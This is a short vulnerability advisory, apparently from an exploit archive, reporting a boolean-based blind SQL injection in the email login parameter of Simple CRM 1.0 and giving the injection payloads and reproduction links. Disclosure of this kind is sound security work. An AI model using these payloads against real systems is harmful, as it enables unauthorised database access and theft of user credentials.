Simple Customer Relationship Management CRM 2023 1.0 SQL Injection

## Title: SCRMS-2023-05-27-1.0-Multiple-SQLi## Author: nu11secur1ty## Date: 05.27.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `email` parameter appears to be vulnerable to SQL injectionattacks. The test payloads 45141002' or 6429=6429-- and 37491017' or5206=5213-- were each submitted in the email parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all users and their passwords for access to the system.Even if they are strongly encrypted this will get some time, but thisis not a problem for an attacker to decrypt if, if they are not enoughstrongly encrypted.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: email (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)## Time spend:01:00:00